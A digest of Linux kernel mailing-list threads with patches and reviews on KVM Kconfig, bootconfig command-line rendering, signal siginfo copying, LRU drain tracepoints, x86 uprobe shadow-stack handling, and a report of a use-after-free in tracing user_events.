Other than noting that this should be applied against the current kvm/next, I
don't think there's anything else to be done?

^ permalink raw reply

* Re: [PATCH v8 05/46] KVM: Make CONFIG_KVM_VM_MEMORY_ATTRIBUTES selectable
From: Sean Christopherson @ 2026-06-23  0:16 UTC (permalink / raw)
  To: Julian Braha
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, yan.y.zhao, forkloop, pratyush,
	suzuki.poulose, aneesh.kumar, liam, Paolo Bonzini,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, Jonathan Corbet, Shuah Khan, Shuah Khan,
	Vishal Annapurve, Andrew Morton, Chris Li, Kairui Song,
	Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen, Yuanchu Xie,
	Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt, Kiryl Shutsemau,
	Baoquan He, Jason Gunthorpe, Vlastimil Babka, kvm, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest, linux-mm,
	linux-coco
In-Reply-To: <8e53844c-f2f8-4a4b-bf72-f3140c170d43@gmail.com>

On Fri, Jun 19, 2026, Julian Braha wrote:
> Hi Ackerley,
> 
> On 6/19/26 01:31, Ackerley Tng via B4 Relay wrote:
> 
> >  config KVM_VM_MEMORY_ATTRIBUTES
> > -	bool
> > +	depends on KVM_SW_PROTECTED_VM || KVM_INTEL_TDX || KVM_AMD_SEV
> > +	bool "Enable per-VM PRIVATE vs. SHARED attributes (for CoCo VMs)"
> 
> Sorry for the style nitpick, but could you keep the type and prompt as
> the first attribute in the Kconfig option definition (like the other
> options do)?

No need to be sorry, I've no idea why I put the "depends" first.  I don't even
know if that qualifies as a nit :-)

Ackerley, if you can provide your SoB (for Fuad's feedback), I can fixup when
applying (assuming nothing else necessitates v9).

^ permalink raw reply

* Re: [PATCH v4 6/7] Documentation: bootconfig: document build-time cmdline rendering
From: Masami Hiramatsu @ 2026-06-23  0:11 UTC (permalink / raw)
  To: Breno Leitao
  Cc: Andrew Morton, Nathan Chancellor, paulmck, Nicolas Schier,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, linux-kernel, linux-trace-kernel, linux-kbuild,
	bpf, kernel-team
In-Reply-To: <ajkfTQwmmVo0DvFx@gmail.com>

Hi Breno,

On Mon, 22 Jun 2026 05:30:53 -0700
Breno Leitao <leitao@debian.org> wrote:

> On Thu, Jun 18, 2026 at 09:47:19AM +0900, Masami Hiramatsu wrote:
> > On Wed, 17 Jun 2026 02:56:23 -0700
> > Breno Leitao <leitao@debian.org> wrote:
> > 
> > > On Wed, Jun 10, 2026 at 07:58:10AM -0700, Breno Leitao wrote:
> > > > On Wed, Jun 10, 2026 at 11:37:20PM +0900, Masami Hiramatsu wrote:
> > > > > To avoid confusion, when this option is used, shouldn't we treat it
> > > > > the same way as if embedded command lines were enabled, and either
> > > > > not display it in /proc/bootconfig (or always display it, by merging
> > > > > the rendered string)?
> > > > 
> > > > You're right that EMBED_CMDLINE breaks it: the embedded kernel.* keys
> > > > are already in boot_command_line before setup_boot_config() ever sees
> > > > the initrd bconf, so a user reading /proc/bootconfig would see only
> > > > the initrd keys while parse_early_param() acted on the embedded ones.
> > > > That's exactly the split-state Sashiko was circling around.
> > > > 
> > > > Both options you suggest work for me, but they pull in opposite
> > > > directions and I'd rather not guess wrong on the user-facing
> > > > contract.  Which do you prefer for v5?
> > > > 
> > > >   (a) Don't display embedded in /proc/bootconfig -- keep the current
> > > >       "file shows the active bootconfig source" behavior and document
> > > >       that with EMBED_CMDLINE=y, the kernel.* subtree may have been
> > > >       applied separately via the cmdline.
> > > > 
> > > >   (b) Always display embedded by merging the rendered string into
> > > >       /proc/bootconfig when EMBED_CMDLINE=y, so the file reflects
> > > >       what was actually applied.
> > > > 
> > > > Happy to go either way
> > > 
> > > Following up on my own mail rather than leaving it fully open: after
> > > looking at the code more, I'd like to recommend (a).
> > 
> > Agreed. Sorry for replying late.
> 
> No problem, thanks. Quick heads-up: v5 already went out and crossed with
> this mail. It takes (a) and extends bootconfig.rst to walk through the
> four sources (bootloader cmdline, embedded cmdline, initrd bootconfig,
> embedded bootconfig), so that part is already in flight:
> 
>   https://lore.kernel.org/r/20260617-bootconfig_using_tools-v5-0-fd589a9cc5e3@debian.org
> 
> The naming/mutual-exclusion rework below I'll fold into v6.

Yeah, thanks for updating!

> 
> > Indeed. So I think this EMBED_CMDLINE is more like CMDLINE set by
> > bootconfig file, instead of embedded string. That is useful for reusing
> > the boot options. We need to change the explanation and clarify it.
> 
> Agreed, that's a much clearer model. v6 will reframe the Kconfig help and
> bootconfig.rst around "this is CONFIG_CMDLINE, sourced from a bootconfig
> file at build time" rather than "an embedded bootconfig that also feeds
> the cmdline".

Nice!

> 
> It also matches what the code already does precedence-wise: the rendered
> "kernel" string is prepended to boot_command_line in setup_arch(), so it
> sits in front of the bootloader args and parse_args() last-wins lets the
> bootloader override it -- i.e. exactly CONFIG_CMDLINE without _OVERRIDE.
> So this is mostly a rename + dependency + docs change, not a behavioral
> one. (A _FORCE/_EXTEND-style variant could come later if there's demand;
> the current behavior is the plain "overridable default" one.)

OK. Yeah, for the first step, I think current behavior is enough.

> 
> > Thus we should make those configs mutually exclusive. If the user has already
> > set CONFIG_CMDLINE, EMBED_CMDLINE should not be enabled.
> 
> Makes sense -- two built-in cmdline sources at once is confusing. I'll
> make them mutually exclusive in v6. I'm thinking:
> 
>   depends on CMDLINE = ""
> 
> on the new symbol. On x86 CONFIG_CMDLINE is a string that depends on
> CMDLINE_BOOL and defaults to "", so this reads as "only offer the
> bootconfig-rendered cmdline when no static CONFIG_CMDLINE is configured",
> and it works the same on other arches that define CMDLINE as a string.
> Does that match what you had in mind, or would you rather gate it the
> other way (CMDLINE depends on !the-new-symbol)?

No, this looks good and clear enough to me.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it may be natural to call it CONFIG_CMDLINE_BOOT_CONFIG.
> > In this case, we render the cmdline string from the bootconfig at build time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG.

Yeah, thanks!

> 
> Another nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG would
> pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG unless you'd
> rather keep CONFIG_CMDLINE_BOOT_CONFIG -- either is fine by me.

I think it should use the same pattern to avoid confusion.

> 
> One clarification on "set CONFIG_CMDLINE with the rendered string":
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE. The mechanism stays "render into
> .init.rodata, merge into boot_command_line in setup_arch()"; what changes
> is how we name and document it, plus the mutual exclusion above. Let me

Yes, it is fine to me because it does not change the current behavior.

> 
> > So you can see CONFIG_BOOT_CONFIG_EMBED_CMDLINE is a bit special.
> > I think it may be natural to call it CONFIG_CMDLINE_BOOT_CONFIG.
> 
> I'll rename it for v6. One nit: the arch opt-in symbol is already
> ARCH_SUPPORTS_CMDLINE_FROM_BOOTCONFIG, so CONFIG_CMDLINE_FROM_BOOTCONFIG
> would pair with it verbatim. I'll use CONFIG_CMDLINE_FROM_BOOTCONFIG

Yes, that's better to be renamed.

> > In this case, we render the cmdline string from bootconfig build-time
> > and set CONFIG_CMDLINE with the rendered cmdline string.
> 
> CONFIG_CMDLINE is a Kconfig string fixed when .config is read, while the
> render happens later during the build, so we can't literally store the
> rendered text into CONFIG_CMDLINE.  Let me know if you can envision a way to
> get it done.

Ah, OK. Never mind; as long as it is shown in /proc/cmdline, I think it is OK.
(BTW, if we use the embedded bootconfig, the file path is shown in
 /proc/config.gz; maybe I need to note that.)

> > I think we can proceed without rendering it in /proc/bootconfig
> > at this point. Later, once we find a way to detect early parameters
> > correctly, we can fix it.
> 
> Sounds good. I'll document the sharp edge (with both an embedded cmdline and an
> initrd bootconfig, early params reflect the embedded values because the initrd
> isn't parsed yet) and leave the early-param-aware override detection as the
> follow-up you describe.

Thanks for documenting it :)

> 
> > (BTW, early parameter problem is a bit complicated. It is not hard
> > to distinguish early parameters, but kernel accepts the same key
> > for early parameter and normal parameter. e.g. "console=")
> 
> Right, console= being both is the awkward case. Agreed that's better as
> its own series once we have a reliable way to detect early params.
> 
> So the v6 plan:
>   - rename CONFIG_BOOT_CONFIG_EMBED_CMDLINE -> CONFIG_CMDLINE_FROM_BOOTCONFIG
>     (or _BOOT_CONFIG, your call)
>   - make it mutually exclusive with CONFIG_CMDLINE (depends on CMDLINE = "")
>   - reframe the Kconfig help + bootconfig.rst as "CONFIG_CMDLINE from a
>     bootconfig file"
>   - keep (a): no rendering in /proc/bootconfig; document the early-param
>     sharp edge
>   - defer early-param-aware override detection to a follow-up
> 
> Thanks for the direction,

Thanks for working on this feature!

Thank you,

> --breno
> 


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* [PATCH v2 2/2] signal: make send_signal_locked() take const siginfo
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() should not change the caller's siginfo. Make that
part of the type and keep the local rewrite on its copy.

Suggested-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- New patch from Oleg's suggestion.
- Link to Oleg's suggestion:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m5f8a2d54928efff41de539969b68149e1ec5fca4

 include/linux/signal.h        |  2 +-
 include/trace/events/signal.h |  4 ++--
 kernel/signal.c               | 20 +++++++++++---------
 3 files changed, 14 insertions(+), 12 deletions(-)

diff --git a/include/linux/signal.h b/include/linux/signal.h
index f19816832f05..a1ba8c5973c6 100644
--- a/include/linux/signal.h
+++ b/include/linux/signal.h
@@ -283,7 +283,7 @@ extern int do_send_sig_info(int sig, struct kernel_siginfo *info,
 				struct task_struct *p, enum pid_type type);
 extern int group_send_sig_info(int sig, struct kernel_siginfo *info,
 			       struct task_struct *p, enum pid_type type);
-extern int send_signal_locked(int sig, struct kernel_siginfo *info,
+extern int send_signal_locked(int sig, const struct kernel_siginfo *info,
 			      struct task_struct *p, enum pid_type type);
 extern int sigprocmask(int, sigset_t *, sigset_t *);
 extern void set_current_blocked(sigset_t *);
diff --git a/include/trace/events/signal.h b/include/trace/events/signal.h
index 1db7e4b07c01..05a46135ee34 100644
--- a/include/trace/events/signal.h
+++ b/include/trace/events/signal.h
@@ -49,8 +49,8 @@ enum {
  */
 TRACE_EVENT(signal_generate,
 
-	TP_PROTO(int sig, struct kernel_siginfo *info, struct task_struct *task,
-			int group, int result),
+	TP_PROTO(int sig, const struct kernel_siginfo *info,
+		 struct task_struct *task, int group, int result),
 
 	TP_ARGS(sig, info, task, group, result),
 
diff --git a/kernel/signal.c b/kernel/signal.c
index d72d9be3a992..26e8b8e1d03c 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1037,7 +1037,7 @@ static inline bool legacy_queue(struct sigpending *signals, int sig)
 	return (sig < SIGRTMIN) && sigismember(&signals->signal, sig);
 }
 
-static int __send_signal_locked(int sig, struct kernel_siginfo *info,
+static int __send_signal_locked(int sig, const struct kernel_siginfo *info,
 				struct task_struct *t, enum pid_type type, bool force)
 {
 	struct sigpending *pending;
@@ -1154,7 +1154,7 @@ static int __send_signal_locked(int sig, struct kernel_siginfo *info,
 	return ret;
 }
 
-static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
+static inline bool has_si_pid_and_uid(const struct kernel_siginfo *info)
 {
 	bool ret = false;
 	switch (siginfo_layout(info->si_signo, info->si_code)) {
@@ -1178,10 +1178,11 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 	return ret;
 }
 
-int send_signal_locked(int sig, struct kernel_siginfo *info,
+int send_signal_locked(int sig, const struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
 	struct kernel_siginfo rewritten;
+	const struct kernel_siginfo *send_info = info;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1196,26 +1197,27 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		struct user_namespace *t_user_ns;
 
 		rewritten = *info;
-		info = &rewritten;
+		send_info = &rewritten;
 
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-			kuid_t uid = make_kuid(current_user_ns(), info->si_uid);
-			info->si_uid = from_kuid_munged(t_user_ns, uid);
+			kuid_t uid = make_kuid(current_user_ns(), rewritten.si_uid);
+
+			rewritten.si_uid = from_kuid_munged(t_user_ns, uid);
 		}
 		rcu_read_unlock();
 
 		/* A kernel generated signal? */
-		force = (info->si_code == SI_KERNEL);
+		force = (rewritten.si_code == SI_KERNEL);
 
 		/* From an ancestor pid namespace? */
 		if (!task_pid_nr_ns(current, task_active_pid_ns(t))) {
-			info->si_pid = 0;
+			rewritten.si_pid = 0;
 			force = true;
 		}
 	}
-	return __send_signal_locked(sig, info, t, type, force);
+	return __send_signal_locked(sig, send_info, t, type, force);
 }
 
 static void print_fatal_signal(int signr)
-- 
2.53.0

^ permalink raw reply related

* [PATCH v2 1/2] signal: avoid shared siginfo namespace rewrites
From: Bradley Morgan @ 2026-06-22 20:25 UTC (permalink / raw)
  To: Oleg Nesterov, Christian Brauner
  Cc: Steven Rostedt, Masami Hiramatsu, Mathieu Desnoyers,
	Andrew Morton, Peter Zijlstra, Marco Elver, Aleksandr Nogikh,
	Thomas Gleixner, Adrian Huang, Kexin Sun, linux-kernel,
	linux-trace-kernel, Bradley Morgan, stable
In-Reply-To: <20260622164029.11474-1-include@grrlz.net>

send_signal_locked() rewrites sender ids for the target namespace.
Group sends reuse the same siginfo, so one recipient can affect the
next.

Copy the siginfo before changing it.

Fixes: 7a0cf094944e ("signal: Correct namespace fixups of si_pid and si_uid")
Cc: stable@vger.kernel.org
Signed-off-by: Bradley Morgan <include@grrlz.net>
---
Changes since v1:
- No code changes in this patch.
- Add patch 2 for Oleg's const suggestion.
- Link to v1:
  https://lore.kernel.org/all/0873AC4A-3CB2-4F7B-BFE6-75D855AD22DC@grrlz.net/T/#m89955d13f10807c316d34cc76680d690a2d95b31

 kernel/signal.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/kernel/signal.c b/kernel/signal.c
index b9fc7be1a169..d72d9be3a992 100644
--- a/kernel/signal.c
+++ b/kernel/signal.c
@@ -1181,6 +1181,7 @@ static inline bool has_si_pid_and_uid(struct kernel_siginfo *info)
 int send_signal_locked(int sig, struct kernel_siginfo *info,
 		       struct task_struct *t, enum pid_type type)
 {
+	struct kernel_siginfo rewritten;
 	/* Should SIGKILL or SIGSTOP be received by a pid namespace init? */
 	bool force = false;
 
@@ -1194,6 +1195,9 @@ int send_signal_locked(int sig, struct kernel_siginfo *info,
 		/* SIGKILL and SIGSTOP is special or has ids */
 		struct user_namespace *t_user_ns;
 
+		rewritten = *info;
+		info = &rewritten;
+
 		rcu_read_lock();
 		t_user_ns = task_cred_xxx(t, user_ns);
 		if (current_user_ns() != t_user_ns) {
-- 
2.53.0

^ permalink raw reply related

* Re: [PATCH v3 5/7] kernel: Use mutable list iterators
From: Eduard Zingerman @ 2026-06-22 19:03 UTC (permalink / raw)
  To: Kaitao Cheng, Paul Moore, Eric Paris, Alexei Starovoitov,
	Daniel Borkmann, Andrii Nakryiko, Kumar Kartikeya Dwivedi,
	David S. Miller, Jakub Kicinski, Jesper Dangaard Brouer,
	John Fastabend, Tejun Heo, Johannes Weiner, Michal Koutný,
	Maarten Lankhorst, Maxime Ripard, Natalie Vock, Peter Zijlstra,
	Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim,
	Masami Hiramatsu, Oleg Nesterov, Peter Oberparleiter,
	Andrew Morton, Baoquan He, Mike Rapoport, Pasha Tatashin,
	Pratyush Yadav, Naveen N Rao, Josh Poimboeuf, Jiri Kosina,
	Miroslav Benes, Petr Mladek, Will Deacon, Boqun Feng,
	Luis Chamberlain, Petr Pavlu, Daniel Gomez, Sami Tolvanen,
	Steffen Klassert, Daniel Jordan, Rafael J. Wysocki,
	Davidlohr Bueso, Paul E. McKenney, Josh Triplett,
	Frederic Weisbecker, Neeraj Upadhyay, Joel Fernandes,
	Uladzislau Rezki, Juri Lelli, Vincent Guittot, Kees Cook,
	Balbir Singh, Anna-Maria Behnsen, Thomas Gleixner, John Stultz,
	KP Singh, Matt Bobrowski, Nathan Chancellor, Martin KaFai Lau,
	Song Liu, Mark Rutland, Mathieu Desnoyers, Dietmar Eggemann,
	David Vernet, Steven Rostedt
  Cc: audit, linux-kernel, bpf, netdev, cgroups, dri-devel,
	linux-perf-users, linux-trace-kernel, kexec, live-patching,
	linux-modules, linux-crypto, linux-pm, rcu, sched-ext, llvm,
	Kaitao Cheng
In-Reply-To: <20260622042811.31684-1-kaitao.cheng@linux.dev>

On Mon, 2026-06-22 at 12:28 +0800, Kaitao Cheng wrote:
> From: Kaitao Cheng <chengkaitao@kylinos.cn>
> 
> The safe list iteration helpers require callers to provide a temporary
> cursor even when the cursor is only used internally by the loop. This
> leaves many functions with otherwise unused variables whose only purpose
> is to satisfy the old iterator interface.
> 
> Use the mutable list iteration helpers for those cases. The mutable
> helpers keep the same removal-safe traversal semantics, while allowing
> the temporary cursor to be internal to the macro when the caller does
> not need to observe it.
> 
> Convert list, hlist and llist users under kernel/ where the temporary
> cursor is not used outside the iteration. Keep the explicit cursor form
> where the next entry is still needed by the surrounding code.
> 
> No functional change intended.
> 
> Signed-off-by: Kaitao Cheng <chengkaitao@kylinos.cn>
> ---

Besides the fact that this does not apply,
I don't see a reason why this is needed for the BPF sub-tree.

[...]

^ permalink raw reply

* [PATCH v5] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 18:51 UTC (permalink / raw)
  To: linux-mm, willy, shakeel.butt, usama.arif, akpm, vbabka, mhocko,
	rostedt, mhiramat, mathieu.desnoyers, kasong, qi.zheng, baohua,
	axelrasmussen, yuanchu, weixugc, chrisl, shikemeng, nphamcs,
	baoquan.he, youngjun.park
  Cc: linux-kernel, linux-trace-kernel

LRU add batches can be drained before they reach capacity. This can be a
source of LRU lock contention, but it is not currently possible to
attribute these drains to callers with existing tracepoints.

Add mm_lru_add_drain to report the CPU and lru_add batch count when an
lru_add batch is drained. This allows tracing to distinguish full drains
from partial drains and attribute them to the calling stack.

Add mm_lru_add_drain_all to capture callers of __lru_add_drain_all and
whether they set the force flag for all CPUs. The tracepoint resembles
the signature of the enclosing function, but is needed because of
potential inlining.

Note that DECLARE_TRACE() is used for these new trace hooks to avoid
creating a new trace event ABI.

Signed-off-by: JP Kobryn <jp.kobryn@linux.dev>
Reviewed-by: Barry Song <baohua@kernel.org>
Acked-by: Shakeel Butt <shakeel.butt@linux.dev>
---
v5:
  - change from trace events to bare trace hooks

v4: https://lore.kernel.org/linux-mm/20260610234808.212397-1-jp.kobryn@linux.dev/
  - renamed nr_folio_add to nr_folios in lru_add_drain()
  - renamed nr to nr_folios in tracepoint for consistency

v3: https://lore.kernel.org/linux-mm/20260610195220.12403-1-jp.kobryn@linux.dev/
  - restored and renamed tracepoint in __lru_add_drain_all

v2: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/
  - removed mm_lru_drain_all tracepoint

v1: https://lore.kernel.org/linux-mm/20260609041156.31127-1-jp.kobryn@linux.dev/

 include/trace/events/pagemap.h | 8 ++++++++
 mm/swap.c                      | 7 ++++++-
 2 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/include/trace/events/pagemap.h b/include/trace/events/pagemap.h
index 171524d3526d..36c3a90f0acc 100644
--- a/include/trace/events/pagemap.h
+++ b/include/trace/events/pagemap.h
@@ -77,6 +77,14 @@ TRACE_EVENT(mm_lru_activate,
 	TP_printk("folio=%p pfn=0x%lx", __entry->folio, __entry->pfn)
 );
 
+DECLARE_TRACE(mm_lru_add_drain,
+	      TP_PROTO(int cpu, unsigned int nr_folios),
+	      TP_ARGS(cpu, nr_folios));
+
+DECLARE_TRACE(mm_lru_add_drain_all,
+	      TP_PROTO(bool force_all_cpus),
+	      TP_ARGS(force_all_cpus));
+
 #endif /* _TRACE_PAGEMAP_H */
 
 /* This part must be outside protection */
diff --git a/mm/swap.c b/mm/swap.c
index 588f50d8f1a8..460e56370b3c 100644
--- a/mm/swap.c
+++ b/mm/swap.c
@@ -694,9 +694,12 @@ void lru_add_drain_cpu(int cpu)
 {
 	struct cpu_fbatches *fbatches = &per_cpu(cpu_fbatches, cpu);
 	struct folio_batch *fbatch = &fbatches->lru_add;
+	unsigned int nr_folios = folio_batch_count(fbatch);
 
-	if (folio_batch_count(fbatch))
+	if (nr_folios) {
 		folio_batch_move_lru(fbatch, lru_add);
+		trace_mm_lru_add_drain_tp(cpu, nr_folios);
+	}
 
 	fbatch = &fbatches->lru_move_tail;
 	/* Disabling interrupts below acts as a compiler barrier. */
@@ -869,6 +872,8 @@ static inline void __lru_add_drain_all(bool force_all_cpus)
 	if (WARN_ON(!mm_percpu_wq))
 		return;
 
+	trace_mm_lru_add_drain_all_tp(force_all_cpus);
+
 	/*
 	 * Guarantee folio_batch counter stores visible by this CPU
 	 * are visible to other CPUs before loading the current drain
-- 
2.54.0


^ permalink raw reply related

* [PATCH 2/2] selftests/x86: Add shadow stack uprobe CALL test
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor
In-Reply-To: <20260622183109.1137245-1-dwindsor@gmail.com>

Add coverage for entry uprobes installed on CALL instructions while user
shadow stack is enabled. The test puts an entry uprobe on a helper whose
first instruction is a relative CALL, then verifies that the call/return
sequence completes without SIGSEGV.

This catches regressions where x86 uprobe CALL emulation updates the
regular user stack but leaves the CET shadow stack stale.

Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 tools/testing/selftests/x86/test_shadow_stack.c | 86 +++++++++++++++++++++++++
 1 file changed, 86 insertions(+)

diff --git a/tools/testing/selftests/x86/test_shadow_stack.c b/tools/testing/selftests/x86/test_shadow_stack.c
index 21af54d5f4ea..3d6ca33edba4 100644
--- a/tools/testing/selftests/x86/test_shadow_stack.c
+++ b/tools/testing/selftests/x86/test_shadow_stack.c
@@ -873,6 +873,86 @@ static int test_uretprobe(void)
 	return err;
 }
 
+/* Keep the CALL first so the function address is exactly the probed CALL. */
+extern void uprobe_call_trigger(void);
+asm (".pushsection .text\n"
+	".global uprobe_call_target\n"
+	".type uprobe_call_target, @function\n"
+	"uprobe_call_target:\n"
+	"	ret\n"
+	".size uprobe_call_target, .-uprobe_call_target\n"
+
+	".global uprobe_call_trigger\n"
+	".type uprobe_call_trigger, @function\n"
+	"uprobe_call_trigger:\n"
+	"	call uprobe_call_target\n"
+	"	ret\n"
+	".size uprobe_call_trigger, .-uprobe_call_trigger\n"
+	".popsection\n"
+);
+
+/* If CALL emulation misses the shadow stack update, this exits via SIGSEGV. */
+static int test_uprobe_call(void)
+{
+	const size_t attr_sz = sizeof(struct perf_event_attr);
+	const char *file = "/proc/self/exe";
+	int fd = -1, type, err = 1;
+	struct perf_event_attr attr;
+	struct sigaction sa = {};
+	ssize_t offset;
+
+	type = determine_uprobe_perf_type();
+	if (type < 0) {
+		if (type == -ENOENT)
+			printf("[SKIP]\tUprobe on CALL test, uprobes are not available\n");
+		return 0;
+	}
+
+	offset = get_uprobe_offset(uprobe_call_trigger);
+	if (offset < 0)
+		return 1;
+
+	sa.sa_sigaction = segv_gp_handler;
+	sa.sa_flags = SA_SIGINFO;
+	if (sigaction(SIGSEGV, &sa, NULL))
+		return 1;
+
+	/* Setup entry uprobe through perf event interface. */
+	memset(&attr, 0, attr_sz);
+	attr.size = attr_sz;
+	attr.type = type;
+	attr.config = 0;
+	attr.config1 = (__u64)(unsigned long)file;
+	attr.config2 = offset;
+
+	fd = syscall(__NR_perf_event_open, &attr, 0 /* pid */, -1 /* cpu */,
+		     -1 /* group_fd */, PERF_FLAG_FD_CLOEXEC);
+	if (fd < 0)
+		goto out;
+
+	if (sigsetjmp(jmp_buffer, 1))
+		goto out;
+
+	if (ARCH_PRCTL(ARCH_SHSTK_ENABLE, ARCH_SHSTK_SHSTK))
+		goto out;
+
+	/*
+	 * This either segfaults and goes through sigsetjmp above
+	 * or succeeds and we're good.
+	 */
+	uprobe_call_trigger();
+
+	printf("[OK]\tUprobe on CALL test\n");
+	err = 0;
+
+out:
+	ARCH_PRCTL(ARCH_SHSTK_DISABLE, ARCH_SHSTK_SHSTK);
+	signal(SIGSEGV, SIG_DFL);
+	if (fd >= 0)
+		close(fd);
+	return err;
+}
+
 void segv_handler_ptrace(int signum, siginfo_t *si, void *uc)
 {
 	/* The SSP adjustment caused a segfault. */
@@ -1071,6 +1151,12 @@ int main(int argc, char *argv[])
 		goto out;
 	}
 
+	if (test_uprobe_call()) {
+		ret = 1;
+		printf("[FAIL]\tuprobe on CALL test\n");
+		goto out;
+	}
+
 	return ret;
 
 out:
-- 
2.43.0

^ permalink raw reply related

* [PATCH 1/2] x86/uprobes: Keep shadow stack in sync for emulated CALLs
From: David Windsor @ 2026-06-22 18:31 UTC (permalink / raw)
  To: mhiramat, oleg, peterz
  Cc: tglx, mingo, bp, dave.hansen, x86, shuah, linux-trace-kernel,
	linux-kselftest, linux-kernel, David Windsor

Uprobe CALL emulation updates the normal user stack, but not the CET user
shadow stack. The subsequent RET then sees a stale shadow stack entry and
raises #CP.

Update the relative CALL emulation and XOL CALL fixup paths to keep the
shadow stack in sync.

Fixes: 488af8ea7131 ("x86/shstk: Wire in shadow stack interface")
Signed-off-by: David Windsor <dwindsor@gmail.com>
---
 arch/x86/kernel/uprobes.c | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/arch/x86/kernel/uprobes.c b/arch/x86/kernel/uprobes.c
index ebb1baf1eb1d..ae32013a7097 100644
--- a/arch/x86/kernel/uprobes.c
+++ b/arch/x86/kernel/uprobes.c
@@ -1246,8 +1246,12 @@ static int default_post_xol_op(struct arch_uprobe *auprobe, struct pt_regs *regs
 		long correction = utask->vaddr - utask->xol_vaddr;
 		regs->ip += correction;
 	} else if (auprobe->defparam.fixups & UPROBE_FIX_CALL) {
+		unsigned long retaddr = utask->vaddr + auprobe->defparam.ilen;
+
 		regs->sp += sizeof_long(regs); /* Pop incorrect return address */
-		if (emulate_push_stack(regs, utask->vaddr + auprobe->defparam.ilen))
+		if (emulate_push_stack(regs, retaddr))
+			return -ERESTART;
+		if (shstk_update_last_frame(retaddr))
 			return -ERESTART;
 	}
 	/* popf; tell the caller to not touch TF */
@@ -1338,6 +1342,10 @@ static bool branch_emulate_op(struct arch_uprobe *auprobe, struct pt_regs *regs)
 		 */
 		if (emulate_push_stack(regs, new_ip))
 			return false;
+		if (shstk_push(new_ip) == -EFAULT) {
+			regs->sp += sizeof_long(regs);
+			return false;
+		}
 	} else if (!check_jmp_cond(auprobe, regs)) {
 		offs = 0;
 	}
-- 
2.43.0

^ permalink raw reply related

* Re: [PATCH] tracing/user_events: fix use-after-free of enabler in user_event_mm_dup()
From: XIAO WU @ 2026-06-22 17:03 UTC (permalink / raw)
  To: Michael Bommarito, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers
  Cc: Beau Belgrave, linux-trace-kernel, linux-kernel, stable
In-Reply-To: <20260618222743.538915-1-michael.bommarito@gmail.com>

Hi,

I came across the Sashiko AI review [1] in this thread and wanted to
share some test results that may be useful.

First — thank you for this patch!  The enabler UAF in
user_event_mm_dup() is a real bug and the fix (kfree → kfree_rcu) is
the right approach for protecting the RCU list walkers.  The selftest
results you included in the commit are also really helpful.

However, I was able to reproduce a second UAF on the *user_event*
object that the Sashiko review flagged — it's still reachable after the
patch is applied.  I've included a PoC and crash log below.

On Thu, Jun 18, 2026 at 06:27:43PM -0400, Michael Bommarito wrote:
 > @@ -404,7 +407,12 @@ static void user_event_enabler_destroy(struct 
user_event_enabler *enabler,
 >      /* No longer tracking the event via the enabler */
 >      user_event_put(enabler->event, locked);
 >
 > -    kfree(enabler);
 > +    /*
 > +     * The enabler is removed from an RCU-traversed list
 > +     * (user_event_mm_dup walks mm->enablers under rcu_read_lock only),
 > +     * so the backing memory must outlive a grace period.
 > +     */
 > +    kfree_rcu(enabler, rcu);
 >  }

The issue: user_event_put(enabler->event, locked) is called
synchronously, before kfree_rcu(enabler, rcu).  If this drops the last
reference to the user_event, delayed_destroy_user_event() is scheduled
on a workqueue, which calls destroy_user_event() → kfree(user).  The
user_event memory is freed without RCU protection.

